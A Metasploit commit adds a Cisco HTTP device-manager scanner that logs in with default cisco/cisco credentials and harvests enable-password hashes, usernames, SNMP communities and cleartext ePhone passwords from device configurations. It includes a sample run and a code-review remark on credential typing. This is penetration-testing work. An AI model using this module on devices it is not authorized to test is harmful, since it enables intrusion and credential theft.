Land #10798, Cisco device manager update

4.x
Jeffrey Martin 2018-12-03 01:39:19 -06:00 committed by Metasploit
parent 16184573cc
commit 73724f111b
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
3 changed files with 83 additions and 16 deletions


@ -0,0 +1,47 @@
## Description
This module scans for the presence of the HTTP interface for a cisco device and attempts to enumerate it using basic authentication.
## Vulnerable Application
Any Cisco networking device with the HTTP inteface turned on.
## Verification Steps
1. Enable the web interface on a cisco device `ip http server`
2. Start msfconsole
3. Do: ```use auxiliary/scanner/http/cisco_device_manager```
4. Do: ```set RHOSTS [IP]```
5. Do: ```run```
## Options
**HttpUsername**
Username to use for basic authentication. Default value is `cisco`
**HttpPassword**
Password to use for basic authentication. Default value is `cisco`
## Scenarios
### Tested on Cisco UC520-8U-4FXO-K9 running IOS 12.4
```
msf5 > use auxiliary/scanner/http/cisco_device_manager
msf5 auxiliary(scanner/http/cisco_device_manager) > set rhosts 2.2.2.2
rhosts => 2.2.2.2
msf5 auxiliary(scanner/http/cisco_device_manager) > set vebose true
vebose => true
msf5 auxiliary(scanner/http/cisco_device_manager) > run
[+] 2.2.2.2:80 Successfully authenticated to this device
[+] 2.2.2.2:80 Processing the configuration file...
[+] 2.2.2.2:80 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 2.2.2.2:80 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 2.2.2.2:80 SNMP Community (RO): public
[+] 2.2.2.2:80 ePhone Username 'phoneone' with Password: 111111
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```


@ -317,6 +317,20 @@ module Auxiliary::Cisco
create_credential_and_login(cred)
end
# This regex captures ephones from Cisco Unified Communications Manager Express (CUE) which come in forms like:
# username "phonefour" password 444444
# username test password test
# This is used for the voicemail system
when /^\s*username (?:")([^\s]+)(?:") password ([^\s]+)/i
user = $1
spass = $2
print_good("#{thost}:#{tport} ePhone Username '#{user}' with Password: #{spass}")
store_loot("cisco.ios.ephone.username_password", "text/plain", thost, "#{user}:#{spass}", "ephone_username_password.txt", "Cisco IOS ephone Username and Password")
cred = credential_data.dup
cred[:private_data] = spass
cred[:private_type] = :nonreplayable_hash
create_credential_and_login(cred)
when /^\s*username ([^\s]+) (secret|password) (\d+) ([^\s]+)/i
user = $1
stype = $3.to_i
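Review bot: The new ephone branch records a cleartext voicemail password with `cred[:private_type] = :nonreplayable_hash`, so the credential store will classify a directly reusable secret as a hash that cannot be replayed; `cred[:private_type] = :password` matches what is actually captured and printed. The comment above the branch also lists the unquoted form `username test password test`, but the regex `(?:")([^\s]+)(?:")` requires both quotes, so that form does not match here. Either drop that example from the comment or handle it in a separate branch placed after the typed `(secret|password) (\d+)` branch, since making the quotes optional in this regex would shadow that branch for lines like `username x password 7 ...`. The enclosing `case` begins and ends outside the hunk, so whether another branch already covers the unquoted form cannot be confirmed from here.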


@ -21,7 +21,7 @@ class MetasploitModule < Msf::Auxiliary
'Name' => 'Cisco Device HTTP Device Manager Access',
'Description' => %q{
This module gathers data from a Cisco device (router or switch) with the device manager
web interface exposed. The USERNAME and PASSWORD options can be used to specify
web interface exposed. The HttpUsername and HttpPassword options can be used to specify
authentication.
},
'Author' => [ 'hdm' ],
@ -33,6 +33,11 @@ class MetasploitModule < Msf::Auxiliary
[ 'OSVDB', '444'],
],
'DisclosureDate' => 'Oct 26 2000'))
register_options(
[
OptString.new('HttpUsername', [true, 'The HTTP username to specify for basic authentication', 'cisco']),
OptString.new('HttpPassword', [true, 'The HTTP password to specify for basic authentication', 'cisco'])
])
end
def run_host(ip)
@ -54,9 +59,10 @@ class MetasploitModule < Msf::Auxiliary
if res and res.body and res.body =~ /Cisco (Internetwork Operating System|IOS) Software/
print_good("#{rhost}:#{rport} Successfully authenticated to this device")
store_valid_credential(user: datastore['HttpUsername'], private: datastore['HttpPassword'])
# Report a vulnerability only if no password was specified
if datastore['PASSWORD'].to_s.length == 0
if datastore['HttpPassword'].to_s.length == 0
report_vuln(
{